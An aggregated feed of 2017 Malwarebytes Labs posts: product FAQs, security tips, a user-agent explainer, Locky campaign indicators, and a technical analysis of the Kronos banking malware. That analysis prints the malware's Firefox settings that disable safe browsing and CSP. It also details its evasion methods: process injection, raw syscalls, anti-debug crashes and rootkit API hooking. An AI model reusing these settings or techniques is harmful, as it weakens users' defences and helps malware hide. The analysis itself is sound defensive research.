Solution Corner: Malwarebytes for Android

Malwarebytes - Thu, 08/24/2017 - 14:00

People have become increasingly reliant on their mobile devices in recent years. Smartphones and tablets have revolutionized daily life. Unfortunately, such rapid growth has also attracted criminals, bringing Android up to par with Windows in terms of infection rates.

Android threat landscape

A rapidly increasing group of threats on Android devices are so-called screen lockers, a form of ransomware that attempts to hold your device hostage by locking the screen with a ransom message and making it unusable. Android ransomware rose by nearly 140% globally from Q1 to Q2 of this year alone.

Trojan malware is also on the rise, increasing by 10% in that same timeframe, with many of the threats in this category being banking Trojans. Such malware poses a significant risk, allowing attackers to potentially clean out an unfortunate victim’s bank account.

Potentially unwanted programs (PUPs) are also a growing threat, accounting for nearly half of all Android threat detections in the first half of this year. PUPs may sound cute, but they usually scam the user into purchasing software or services that are not actually legitimate and can introduce security vulnerabilities.

Introducing Malwarebytes for Android

We have improved our previously great Android app with many new features. The same basic functionality is still available for free in the new Malwarebytes for Android, but people who want even better protection can upgrade Malwarebytes for Android to Premium, gaining many security improvements.

Block and remediate ransomware

Malwarebytes for Android has advanced anti-ransomware capabilities that can detect and block ransomware before any damage is done.

If some screenlocker should happen to slip through, however, Malwarebytes can help to remediate the problem, removing the screen lock and giving you back control of your device.

Sophisticated real-time protection

Malwarebytes can identify and block threats before they can get a foothold on your device, using deeper scanning technologies and an ability to scan apps before they are installed.

Protect your privacy and security

A new privacy manager provides the ability to see what privileges each of your installed apps use so you can see if any apps are accessing data they shouldn’t be. The security audit feature alerts you to potential security vulnerabilities in your device settings and steps you through the process of fixing the issues.

Remote security

Secure a lost or stolen device remotely using SMS commands. You can remotely lock, change the PIN, display a message or even sound a siren. You can even use this to help with ransomware remediation, if necessary!

Malicious link detection

Malwarebytes scans your incoming text messages for phishing attempts. You can also make your browsing safer by sharing links – or text containing links – from other apps with the Malwarebytes app before clicking them, to see if they are malicious.

Don’t become a victim

People rely on their mobile devices for all manner of sensitive activities: banking, purchases, accessing online accounts, and much more. Malware can inject itself into these activities to steal user data or money. Further, the devices themselves have a value that can be exploited through ransom demands or theft.

Don’t let your Android phone or tablet be a source of trouble. Protect it with Malwarebytes for Android today!




What are the key features of Malwarebytes for Android?
  • Advanced protection
    • Anti-ransomware, with remediation
    • Deep scanning technology
    • Scanning of apps prior to installation
  • Premium trial
    • App will provide a trial of the Premium feature set
    • In-app purchasing via Google Play
    • Optional activation via multi-platform key from Keystone
  • UI overhaul
    • Premium UI features
    • Home screen widget
  • On-demand text scan for phishing links
    • Share any text with the Malwarebytes app to scan links contained in that text
  • SMS device control
    • Remediate ransomware and remotely control the device via SMS commands
  • More aggressive stance against PUPs


Why does Malwarebytes for Android have different features than for Windows?

Malwarebytes products are designed specifically for each platform, and to target the threats that are present on each platform. Thus, some features on one platform do not make sense on another.

The approach taken on each platform is the one that most effectively counters the threats on that platform. It makes more sense to tailor the solution to the platform than to create a one-size-fits-all solution that really doesn’t fit any platform properly.

Certainly, there are features found in the Windows product that may someday be implemented on Android, but just because a feature exists on Windows is not – and should not be – a guarantee that it will be implemented elsewhere, and vice versa.


What systems are required for Malwarebytes for Android?

Malwarebytes for Android requires Android 4 or later.


Do I need to uninstall the previous free version before installing the new Malwarebytes app?

On Android, the new app will install as an update to the old app, replacing it.

It is important to understand that the user will keep the same functionality they previously had for free, and that functionality will remain free. The purchase gives access to the new Premium features.


Where do I purchase the Premium version of Malwarebytes for Android?

It can be purchased from the Google Play Store as an in-app purchase. It can also be purchased as part of a multi-platform license from the Malwarebytes store.


If I purchased a Malwarebytes for Windows subscription license prior to August 5, 2017, will it work on Android? 

We do not currently offer this feature. But we are collecting all feedback and the product team will review it for upcoming updates.


I want Malwarebytes on my iPhone. When will that be available?

Due to security restrictions on iOS, it is not currently possible to create any kind of anti-malware app for the iPhone. (Sandboxing restrictions prevent apps from accessing files belonging to the system or any other apps, so there is no way to scan an iOS device.) For this reason, there cannot be – and likely never will be – any form of anti-malware for the iPhone.

The post Solution Corner: Malwarebytes for Android appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Solution Corner: Malwarebytes for Mac

Malwarebytes - Thu, 08/24/2017 - 13:00

Mac users have been told for years: Macs don’t get viruses. Even Apple said so, in their famous Get a Mac ads that aired a decade ago. Wow, that’s so cool! It’s good to know we’re all safe. Now, on a different topic, can you tell me why Safari is going to a Russian search engine instead of Google? And I keep getting pop-ups telling me to “clean your Mac from junk!”

Mac threat landscape

Unfortunately, this old “wisdom” has never been true. There has almost always been malware for the Mac. The first widespread virus was the Elk Cloner virus, which actually infected the Apple II, prior to any PC malware. Some of the earliest malware affected the first Macs in the mid-1980s. The switch to a completely new architecture in Mac OS X, in 2001, killed all the old “Classic” Mac malware, but it didn’t take long for more to start appearing, starting with the MW2004 trojan a few years later.

The only reason the myth that Macs can’t get infected with malware has persisted is that, until recently, malware has been fairly rare. Unfortunately, that has begun to change in recent years. Since around 2012, Macs have seen a huge upswing in all manner of threats – malware (including spyware, keyloggers, backdoors, and more), adware, and potentially unwanted programs (PUPs).

Thus far, as of early July 2017, there has been an increase of 230% in Mac malware over last year, and this year is only half over. Worse, that only tells a small part of the story. Adware and PUPs are increasing at an even higher rate, with even the Mac App Store suffering a tidal wave of scam software. Go to any Mac forum these days and it won’t take you five minutes to find someone suffering from some kind of malicious threat.

Introducing Malwarebytes for Mac

Because of these changes to the Mac threat landscape, we have released Malwarebytes for Mac, which includes real-time protection. Now Malwarebytes doesn’t just clean up your Mac, it protects it too!

Zap malware

There is some basic anti-malware protection built into macOS, but it’s not perfect and doesn’t catch everything. Multiple layers of protection are always recommended by security experts. Malwarebytes strives to proactively detect and block all Mac malware, providing additional protection against the worst threats that exist on the Mac.

Block adware and PUPs

Malwarebytes has been recognized for its aggressive stance against adware and PUPs, many of which are not detected by other antivirus programs. It has been widely recommended in the Mac community due to its effectiveness at removing such threats. With real-time protection, Malwarebytes can now detect and quarantine those threats before they get a foothold.

Low impact

Malwarebytes for Mac uses the same unique engine to detect threats, which means that manual scans are still very fast. This also means that the real-time protection is extremely efficient, causing no noticeable impact on the system. Fire up your favorite MMORPG or FPS game without worrying that Malwarebytes will cause your frame rates to drop.

Macs do get infected, so don’t be a victim!

Don’t fall for the hype, there’s nothing implicitly safer about a Mac except for the rarity of threats when compared to Windows. As that starts to change, most Mac users aren’t prepared for it, continuing to think they’re safe simply by virtue of using a Mac. This puts Mac users at higher risk of getting infected with something nasty.

Keeping security in mind at all times is important and can protect you from some threats, but not all of them. Don’t let a one-time mistake cause long-term issues. Malwarebytes for Mac can protect you when it turns out you’re only human and make a mistake.




What are the key features of Malwarebytes for Mac?

The following features are new in version 3.0:

  • Real-Time Protection
    • Detects and quarantines threat files in real-time, rather than requiring manual scans.
  • Minor UI overhaul
    • UI now looks more like MB3 for Windows UI, although much of the Windows functionality is still not present.
  • Menu bar icon
    • Allows the user to access core functionality or open the UI from an icon on the menu bar.
  • Premium trial
    • App will provide a trial of the Premium feature set (real-time protection)


Why does Malwarebytes for Mac have different features than for Windows?

Malwarebytes products are designed specifically for each platform and to target the threats that are present on each platform. Thus, some features on one platform do not make sense on another.

The approach taken on each platform is the one that most effectively counters the threats on that platform. It makes more sense to tailor the solution to the platform than to create a one-size-fits-all solution that really doesn’t fit any platform properly.

Certainly, there are features found in the Windows product that may someday be implemented on Mac, but just because a feature exists on Windows is not – and should not be – a guarantee that it will be implemented elsewhere, and vice versa.


What systems are required for Malwarebytes for Mac?

Malwarebytes for Mac requires macOS 10.10 (Yosemite) or higher, including macOS 10.11 (El Capitan) and macOS 10.12 (Sierra). It currently will not work on macOS 10.13 (High Sierra) betas, but that will be fixed in the Malwarebytes for Mac 3.1 release in September, prior to the release of High Sierra.


Will Malwarebytes for Mac work alongside other security software?

Malwarebytes for Mac should work alongside most other security software, and we have thus far found no issues. However, because it is a significant change from the previous versions, and adds real-time protection, there does exist the possibility of conflicts that have not yet been discovered. We will be making changes in the future that will help to minimize those chances.


Do I need to uninstall the previous free version before installing the new Malwarebytes app?

Many Mac users prefer to keep older copies of apps, where possible until they have become comfortable with a newer app. For this reason, and because the older Malwarebytes Anti-Malware for Mac app can coexist with Malwarebytes for Mac, you can keep both apps indefinitely. When the user is ready to remove Malwarebytes Anti-Malware for Mac, he/she can uninstall it by opening that app and choosing the Uninstall option from the Help menu.

It is important to understand that the user will keep the same functionality they previously had for free, and that functionality will remain free. The purchase gives access to the new Premium features.


If I purchased a Malwarebytes for Windows subscription license prior to August 5, 2017, will it work on Mac? 

We do not currently offer this feature. But we are collecting all feedback and the product team will review it for upcoming updates.


I’m a business customer and I want Malwarebytes for Mac! When can I get it?

Malwarebytes for Mac is a consumer product.

However, the same detection and remediation engine can be found in our Incident Response product for business. We do not yet have real-time protection on Mac for business, in the form of Endpoint Protection, but that will be coming in the future.

The post Solution Corner: Malwarebytes for Mac appeared first on Malwarebytes Labs.

Categories: Techie Feeds

4 Steps for improving employee trust while securing them

Malwarebytes - Wed, 08/23/2017 - 19:04

Earlier this month we held our quarterly Cybercrime Tactics and Techniques Q2 2017 webinar. This event gave thousands of security practitioners and leaders a chance to learn about the latest analysis of threats Malwarebytes Labs has seen around the globe. In case you missed it, you can watch an on-demand replay of that event here:

There’s one thing I’ve noted with all of these events we host—our security community is highly engaged and asks the best questions! This is great because it allows us to drill down even deeper on different topics. Following this recent Cybercrime webinar, one of the attendees brought up a topic that we often hear is a pain point for many businesses.


“What corporate culture practices can companies use to get improved resilience out of employee behavior?”


With so many evolving threats from cybercriminals who employ a variety of tactics and techniques, there’s one element that many security pros consider to be the weak link in any security practice–humans. The challenge is to minimize the impact your users have on your well-laid plans to secure them. To help answer this question and inspire anyone else who is facing this same concern, I thought I’d share 4 key steps you can take within your business to help gain trust with your employees while accomplishing your mission.


#1 Company Expectations: Your business needs to ensure it has spelled out (clearly) what is expected from your employees. Not just for lunch breaks and travel expenses, but for the proper and safe use of company-provided laptops and desktops and for connecting personally-owned devices to your company network. That also includes best practices to follow for home use and while traveling. Having an IT security policy created and communicated to employees is a critical first step. This way nobody can claim “they didn’t know”. This is also a great place to introduce or reinforce your user security awareness training.



#2 Get the right technology: Speaking of awareness training, simply saying “don’t click on stuff” as a message to employees simply isn’t enough. Back them up with technologies that can prevent phishing attempts, block spam email, block connections or re-direction to known malicious websites, IP addresses, and servers. That way, for the number of links that are clicked and attachments that are opened—this common threat vector can be proactively blocked.



#3 Build trust with employees: In order to build trust and teamwork with your company’s staff, you need to be fair and up front with them. Don’t try to trick your employees with unannounced security tests (e.g., phishing emails, etc.). Instead, let them know ahead of time that you’ll be testing them to measure their diligence. Don’t tell them when, but give them fair warning. This is when you can also take the opportunity to promote your published security training and best practices documentation. (See #1)

#4 Report suspicious behavior: Another key element in fostering trust and open communication with your employees is by enabling them to easily report suspicious behavior. Publish and socialize an email address that employees can forward any suspicious emails or phishing attempts to, along with URLs for sites they’re concerned about. Not only will they feel trusted and empowered to help protect your company (read: employee loyalty), but your security team gains an army of additional eyes and ears to stop potential attacks sooner. If you have a dedicated SOC, consider publishing an employee telephone hotline number that they can call if they suspect a security threat to your business, regardless if it’s physical or digital.


In keeping your business secure, it is critical that you educate your employees. Luckily, this doesn’t have to be a tedious process. Hopefully, the 4 steps above have simplified that for you. Following that, make sure you have the right security products in place with multiple layers of technologies that provide multi-vector protection, like Malwarebytes Endpoint Protection. Also, I encourage you to join your peers and check out our next Cybercrime Tactics and Techniques webinar near the end of October. Just remember to bring your questions.

The post 4 Steps for improving employee trust while securing them appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: user agent

Malwarebytes - Tue, 08/22/2017 - 15:18

If you are the kind of person that uses different browsers or different devices to access websites, you may have noticed that many sites can look quite different depending on which browser you are using. When your browser sends a request to a website, it identifies itself with the user agent string before it retrieves the content you’ve requested. The data in the user agent string help the website to deliver the content in a format that suits your browser. Even though depending on user agents alone is no longer enough to optimize a website, they are still an important source of information.

How can I find mine?

If you want to check the user agent you are broadcasting to websites you visit, have a look here: Along with the user agent identification, the browser sends information about the device and the network that the user is on, like the IP address. That information is responsible for the first 3 lines of information on that site. But the 4th line is the one showing your user agent string. The strings can be confusing if you try to read them yourself. For example, for historical reasons, almost every web bbrowser identifies itself as a Mozilla browser.



Not only browsers utilize a user agent. The same is true for email clients and other programs that display website content. A very different type of user agent strings can be found that are in use by crawlers. This will grant access to certain parts of sites that are restricted for regular users, but on other sites the same crawler may be blocked as a whole.

For the breakdown we will concentrate on user agents that can be expected to be web browsers operated by humans. For these browsers the format of the user agent string is:

Mozilla/[version] ([system and browser information]) [platform] ([platform details]) [extensions]

Since Opera, who were the last to adapt to this standard, also started using the Mozilla user agent string, every popular browser uses this and will start the user agent string with Mozilla and the version number. Where Mozilla/5.0 is the latest version. The platform and platform details is where you can tell the difference between browsers. Some browser extensions are noted in the user agent string if they need certain content to be rendered in a specific way.

Is it a problem to give out this information?

To be honest, it’s a bigger problem not giving it away most of the times. Of course sites with malicious intentions can use this information to deliver specific exploits that have a bigger chance of working on your system. But there are more refined ways to do this, that get far more useful information. Also, it is not that hard to adapt your user agent string, so if you want to mislead the webserver that is not very hard either.

More information about the breakdown

Chrome User Agent explained, breaks down your user string and explains all the elements. Intended for Chrome, but it does explain big parts of other user agents as well.


Pieter Arntz

The post Explained: user agent appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (August 14 – August 20)

Malwarebytes - Mon, 08/21/2017 - 16:02

Last week, we gave some security tips for parents and kids aimed at the new school term. We also took a peek at the inside of the Kronos malware, focusing on how it works and protects itself. And, once again, we spotted a return of Locky ransomware with two new flavors at once, diablo6 and Lukitus.

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers Latest updates for Businesses


Safe surfing, everyone!

The Malwarebytes Labs Team

The post A week in security (August 14 – August 20) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Inside the Kronos malware – part 1

Malwarebytes - Fri, 08/18/2017 - 15:14

Recently, a researcher nicknamed MalwareTech famous from stopping the WannaCry ransomware got arrested for his alleged contribution to creating the Kronos banking malware. We are still not having a clear picture whether the allegations are true or not – but let’s have a look at Kronos itself.


This malware has been first advertised on the black market since around June 2014, by an individual nicknamed VinnyK, writing in Russian:


The full text of the advertisement, translated into English, has been included in the IBM’s Security Intelligence article.

We found Kronos being spread by various exploit kits, i.e. Sundown (more information here). The malware is being distributed up to now – some of the recent samples have been captured about a month ago, dropped from Rig EK.

Nowadays, Kronos is often used for the purpose of downloading other malware. One of the campaigns using Kronos as a downloader was described by Proofpoint.

Analyzed samples

Samples from 2014:

Sample #1 (from 2016)

Sample #2 (from 2017):

Behavioral analysis

After being run, Kronos installs itself in a new folder (%APPDATA%/Microsoft/[machine-specific GUID]):

The dropped sample has a hidden attribute.

Persistence is achieved with the help of a simple Run key:

At the beginning of the execution, the malware modifies the Firefox profile, overwriting user.js with the following content:

user_pref("network.cookie.cookieBehavior", 0); user_pref("privacy.clearOnShutdown.cookies", false); user_pref("security.warn_viewing_mixed", false); user_pref("security.warn_viewing_mixed.show_once", false); user_pref("security.warn_submit_insecure", false); user_pref("security.warn_submit_insecure.show_once", false); user_pref("", false); user_pref("browser.safebrowsing.enabled", false); user_pref("network.http.spdy.enabled", false); user_pref("network.http.spdy.enabled.v3", false); user_pref("network.http.spdy.enabled.v3-1", false); user_pref("network.http.spdy.allow-push", false); user_pref("network.http.spdy.coalesce-hostnames", false); user_pref("network.http.spdy.enabled.deps", false); user_pref("network.http.spdy.enabled.http2", false); user_pref("network.http.spdy.enabled.http2draft", false); user_pref("network.http.spdy.enforce-tls-profile", false); user_pref("security.csp.enable", false);

The new settings are supposed to give to the malware more control over the browser’s behavior and downgrade the security settings. Then, the malware injects itself into svchost, and continues running from there. We can find it listening on local sockets.

It is worth noting, that Kronos deploys a simple userland rootkit, that hides the infected process from the monitoring tools. So, the process running the main module may not be visible. The rootkit is, however, not implemented in a very reliable way, and the effect of hiding does not always work.

Whenever some browser is deployed. Kronos injects its module there and connects with the main module, that runs inside the svchost process. Looking at the TCP connections established by the particular processes (i.e. using ProcessExplorer), we can see that a browser is paired with the infected svchost:

This trick is often used by banking trojans for the purpose of stealing data from the browser. The module injected in the browser hooks the used API and steals the data. After that, it sends this data to the main module that process it further, and reports to the CnC.

Network communication

The analyzed sample was connecting to CnCs at two addresses:

At the time of analysis, each CnC was dead (sinkholed), but still, we could spot some patterns typical for this malware family.

First, the malware sends a beacon that is 74 bytes long:

Then, follows another chunk of data:

In both cases, we can see that the requests are obfuscated by XOR with a random character. This is how the beacon looks after being XOR-decoded:

We can see that all the requests start from the same header, including the GUID specific to the infected machine.

Detailed research about decrypting Kronos communication has been already described here.

Inside Interesting strings

Like most malware, Kronos is distributed packed by various packers/crypters. After unpacking the first layer, we get the malicious payload. We can easily identify Kronos by the typical strings used:

There are more strings that are typical for this particular malware:

Those strings are hashes used to dynamically load particular imported functions. Malware authors use this method to obfuscate used API functions, and by this way, hide the real mission of their tool. Instead of loading function using its explicit name, they enumerate all imports in a particular DLL, calculate hashes of their names, and if the hash matches the hardcoded one, they load that function.

Although the approach is common, the implementation seen in Kronos is not typical. Most malware stores hashes in the form of DWORDs, while Kronos stores them as strings.

Inside the early samples of Kronos, we can find a path to the debug symbols, revealing the structure of directories on the machine where the code was built. The following path was extracted from one of the Kronos samples observed in wild (01901882c4c01625fd2eeecdd7e6745a):


The PDB path can be also found in the DLL (6c64c708ebe14c9675813bf38bc071cf) that belongs to the release of Kronos from 2014:


This module, injlib-client.dll, is the part injected into browsers. In the newer version of Kronos, analogical DLL can be found, however, the PDB path is removed.

Injection into svchost

The main module of Kronos injects itself into svchost (version from 2014 injects into explorer instead). In order to achieve this initial injection, the malware uses a known technique, involving the following steps:

  1. creates the svchost process as suspended
  2. maps its sections into its own address space
  3. modifies the sections, adding its own code and patching the entry point in order to redirect the execution there
  4. resumes the suspended process, letting the injected code execute

Below, you can see the memory inside the infected svchost (in early versions, the injection was targeting explorer). The malware is added in a new, virtual section – in the given example, mapped as 0x70000:

This is how the patched entry point of svchost looks like – as we can see, execution is redirected to the address that lies inside the added section (injected malware):

The execution of the injected PE file starts in a different function now – at RVA 0x11AB0:

– while the original Entry Point of the malware was at RVA 0x12F22:

The malware defends itself from the analysis, and in the case of the VM or debugger being detected, the sample will crash soon after the injection.

Running sample from new Entry Point

The main operations of the malware starts inside the injected module. This is how the new Entry Point looks like:

The main function is responsible for loading all the imports and then deploying the malicious actions.

If you are an analyst trying to run Kronos from that point of the execution, below you will find some tips.

The first block of the function is responsible for filling the import table of the injected module. If we want to run the sample from that point, rather than following it when it is injected, there are some important things to notice. First of all, the loader is supposed to fill some variables inside the injected executable, i.e. the variable module_base. Other functions will refer to this, so, if it does not contain the valid value, the sample will crash. Also, the functions filling the imports expects that the section .rdata (containing the chunks to be filled), is set as writable. It will be set as writable in the case when the sample is injected because then, the full PE is mapped in a memory region with RWX (read-write-execute) access rights. However, in the normal case – when the sample is run from the disk – it is not. That’s why, in order to pass this stage, we need to change the access rights to the section manually.

Another option is to run Kronos sample starting from the next block of the main function. This also leads to successful execution, because in case if the sample is run from the disk rather than injected, imports are filled by windows loader and doing it manually is just redundant.

The last issue to bypass is the defensive check, described below.

Defensive tricks

The malware deploys defense by making several environment checks. The checks are pretty standard – searching blacklisted processes, modules etc. The particular series of checks are called from inside one function, and results are stored as flags set in a dedicated variable:

If the debugger/VM is detected, the variable has a non-zero value. Further, the positive result of this check is used to make the malware crash, interrupting the analysis.

The crash is implemented by taking an execution path inappropriate to the architecture where the sample was deployed. The malware is a 32 bit PE file, but it has a bit different execution paths, depending if it is deployed on 32 or 64-bit system. First, the malware fingerprints the system and sets the flag indicating the architecture:

DWORD is_system64_bit() { DWORD flag = 0; __asm { xor eax, eax mov ax, cs shr eax, 5 mov flag, eax }; return flag; }

This trick uses observations about typical values of CS registry on different versions of Windows (more information here). It is worth to note, that it covers most but not all the cases, and due to this on some versions of Windows the malware may not run properly.
If the debugger/VM is detected, the flag indicating the architecture is being flipped:

That’s why the sample crashes on the next occasion when the architecture-specific path of execution should be taken.

For example, if the sample is deployed on 64-bit machine, under Wow64, the syscall can be performed by using the address pointed by FS:[0xC0]. But if the malware runs on a 32-bit machine, the value pointed by FS:[0xC0] will be NULL, thus, calling it crashes the sample.

This way of interrupting analysis is smart – sample does not exit immediately after the VM/debugger is detected, and it makes it harder to find out what was the reason of the crash.

Using raw syscalls

As mentioned in the previous paragraph, Kronos uses raw syscalls. Syscall basically means an interface that allows calling some function implemented by kernel from the user mode. Applications usually use them via API exported by system DLLs (detailed explanation you can find i.e. on EvilSocket’s blog).

Those API calls can be easily tapped by monitoring tools. That’s why, some malware, for the sake of being stealthier reads the syscalls numbers from the appropriate DLLs, and calls them by it’s own code, without using the DLL as a proxy. This trick has been used i.e. by Floki bot.

Let’s have a look how is it implemented in Kronos. First, it fetches appropriate numbers of the syscalls from the system DLLs. As mentioned before, functions are identified by hashes of their names (full mapping hash-to-function you can find in Lexsi report).

For example:

B6F6X4A8R5D3A7C6 -> NtQuerySystemInformation

The numbers of syscalls are stored in variables, xored with a constant. Fragment of the code responsible for extracting raw syscalls from the DLL:

In order to use them further, for every used syscall Kronos implements its own wrapper function with an appropriate number of parameters. You can see an example below:

The EAX registry contains the number of the syscall. In the given example, it represents the following function:

00000105 -> NtQuerySystemInformation

Kronos uses raw syscalls to call the functions that are related to injections to other processes because they usually trigger alerts. Functions that are called by this way are listed below:

NtAllocateVirtualMemory NtCreateFile NtCreateSection NtGetContextThread NtOpenProcess NtProtectVirtualMemory NtQueryInformationProcess NtQuerySystemInformation NtResumeThread NtSetContextThread NtSetValueKey

It matches the black market advertisement, stating: “The Trojan uses an undetected injection method” (source).

Rootkit and the hooking engine

One of the features that malware provides is a userland rootkit. Kronos hooks API of the processes so that they will not be able to notice its presence. The hooking is done by a specially crafted block of the shellcode, that is implanted in each accessible running process.

First, Kronos prepares the block of shellcode to be implanted. It fills all the necessary data: addresses of functions that are going to be used, and the data specific to the malware installation, that is intended to be hidden.

Then, it searches through the running processes and tries to make injection wherever it is possible. Interestingly, explorer.exe and chrome.exe are omitted:

The shellcode is deployed in a new thread within the infected process:

Below you can see the shellocode inside the memory of the infected process:

When it runs, it hooks the following functions in the address space of the infected process:

ZwCreateFile NtOpenFile ZwQueryDirectoryFile NtEnumerateValueKey RtlGetNativeSystemInformation NtSetValueKey ZwDeleteValueKey ZwQueryValueKey NtOpenProcess

The interesting thing about this part of Kronos is its similarity with a hooking engine described by MalwareTech on his blog in January 2015. Later, he complained in his tweet, that cybercriminals stolen and adopted his code. Looking at the hooking engine of Kronos we can see a big overlap, that made us suspect that this part of Kronos could be indeed based on his ideas. However, it turned out that this technique was described much earlier (i.e. here, //thanks to  @xorsthings for the link ), and both authors learned it from other sources rather than inventing it.

Let’s have a look at the technique itself. During hooking, one may experience concurrency issues. If a half-overwritten function will start to be used by another thread, the application will crash. To avoid this, it is best to install a hook by a single assembly instruction. MalwareTech’s engine used for this purpose an instruction lock cmpxch8b. Similar implementation can be found in Kronos.

The hooking function used by Kronos takes two parameters – the address of the function to be hooked, and the address of function used as a proxy. This is the fragment of the implanted shellcode where the hooking function is being called:

First, the hooking function searches the suitable place in the code of the attacked function, where the hook can be installed:

The above code is an equivalent of the following:

Then, it installs the hook:

As we can see, the used method of  installing hook is almost identical to:

Below you can see an example of Kronos hooking a function ZwResumeThread in the memory of the attacked process. Instruction lock cmxch8b is indeed used to overwrite the function’s beginning:

After the hook installation, whenever the infected process calls the hooked function, the execution is redirected to the proxy code inside the malicious module:

The hooking engine used in Kronos is overall more sophisticated. First of all, even the fact that it is a shellcode not a PE file makes a difficulty level of implementing it higher. The author must have taken care of filling all the functions addresses by his own. But also, the author of Kronos shown some more experience in predicting possible real-life scenarios. For example, he took additional care for checking if the code was not already hooked (i.e. by other Trojans or monitoring tools):

Attacking browsers

The malware injects into a browser an additional module (injlib-client.dll). Below we can see an example of the DLL injected into Firefox address space:

The malware starts the injected module with the help of the injected shellcode:

We can see some API redirections added by the malware. Some of the functions imported by the attacked browser are hooked so that all the data that passes through them is tapped by the Kronos module.

The data that is being grabbed using the hooked browser API is then sent to the main module, that is coordinating malware’s work and reporting to the CnC server.


An overall look at the tricks used by Kronos shows that the author has a prior knowledge in implementing malware solutions. The code is well obfuscated, and also uses various tricks that requires understanding of some low-level workings of the operating system. The author not only used interesting tricks, but also connected them together in a logical and fitting way. The level of precision lead us to the hypothesis, that Kronos is the work of a mature developer, rather than an experimenting youngster.


Overview of the Kronos banking malware rootkit” by Lexsi

Decrypting the configuration

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog:

The post Inside the Kronos malware – part 1 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Locky ransomware returns to the game with two new flavors

Malwarebytes - Wed, 08/16/2017 - 17:57

We recently observed a fresh malicious spam campaign pushed through the Necurs botnet distributing so far, two new variants of Locky ransomware.

In our last Q2 2017 report on tactics and techniques, we mentioned that Locky ransomware had reappeared with a new extension, but went dark again for months.

From August 9th, Locky made another reappearance using a new file extension “.diablo6” to encrypt files with the rescue note: “diablo6-[random].htm“.

Today a new Locky malspam campaign is pushing a new Locky variant that adds the extension “.Lukitus” and the rescue note: “lukitus.html“.

Locky, like numerous other ransomware variants, is usually distributed with the help of spam emails containing a malicious Microsoft Office file or a ZIP attachment containing a malicious script.

Locky variants, callback to a different command and control server (C2) and use the affiliate id: AffilID3 and AffilID5.

Over the last few months, Locky has drastically decreased its distribution, even failed to be distributed at all, then popped back up again, vanished and reappeared once more.

The ups and downs of Locky remain shrouded in mystery. One thing time has taught us is that we should never assume Locky is gone simply because it’s not active at a particular given time.

Locky extension history Active Campaigns:
  • Aug-09: MalSpam attached .zip with .vbs malware. VBS: 4c1975295603dbb3994627a499416b71 Payload: 0d0823d9a5d000b80e27090754f59ee5
  • Aug-11: MalSpam attached PDF with embedded .DOCM files. PDF: 84fd7ba91a587cbf8e20d0f2d5fda285 DOC: 97414e16331df438b2d7da0dad75a8d5 Payload: 9dcdfbb3e8e4020e4cf2fc77e86daa76
  • Aug-14: MalSpam attached RAR with .JS malware. JS: badea58f10d5d2bb242962e3c47ff472 Exe: 6b4221adf0ecb55cd1a4810330b4e1e4
  • Aug-15: MalSpam attached ZIP with .JS malware. JS: 5f1af4f2702a6bc7f5250c9879487f66 Exe: 89ed8780cae257293f610817d6bf1a2e
  • Aug-16: MalSpam attached ZIP with .JS malware. JS: f2c97bd1793ff93073bfde61d12f482b Exe: 4baa57a08c90b78d16c634c22385a748

Malwarebytes protects against this attack at various layers including macro and ransomware mitigation, and neither of those required any signature update.

Click to view slideshow.

The post Locky ransomware returns to the game with two new flavors appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Week in Security (August 7 – August 13)

Malwarebytes - Mon, 08/14/2017 - 19:51

Last week, we explained how security certificates work and how malware authors have used them to block security software from being downloaded and executed. We also showed how the Magnitude exploit kit is spreading a Cerber ransomware variant that uses binary padding in an attempt to get skipped, because of its file size, during antivirus scans.

Latest updates for Businesses
  • Password rules have been way too complicated says the man that invented those rules and regrets it. These rules have now been updated.
  • Locky made another comeback (maybe we should call it Rocky), this time using the diablo6 extension.
  • And another ransomware that came back is the disk-encrypting Mamba.
  • Microsoft and Kaspersky seem to get closer to burying the hatchet concerning the claim by the Russian anti-virus company that the US software giant was unfairly promoting the use of Windows Defender over third-party security products.
  • Salesforce fired two of its senior security engineers after their talk at DEF CON. Or actually told them up front that they would be fired if they went ahead with the talk. Which they did as they didn’t see that text message on time.
Latest updates for Consumers
  • A document was leaked that discloses CouchPotato, which is how the CIA uses a remote tool to stealthy collect RTSP/H.264 video streams.
  • After the leak of some Game of Throne episodes by HBO hackers earlier in the week, there was a bigger data dump this weekend, including episodes of Insecure, Ballers, Barry, The Deuce, a comedy special and other programming.
  • Google brings phishing protection to iOS. A few months after releasing the anti-phishing feature for Android, Google now does the same for iOS. Google : “Going forward, when you click on a suspicious link in a Gmail message on your iPhone or iPad, we’ll show a warning. We recommend that you use caution before proceeding, because the link is likely unsafe. Only proceed if you’re confident there’s no risk.”
 In other security news:

Safe surfing, everyone!

The Malwarebytes Labs Team

The post Week in Security (August 7 – August 13) appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds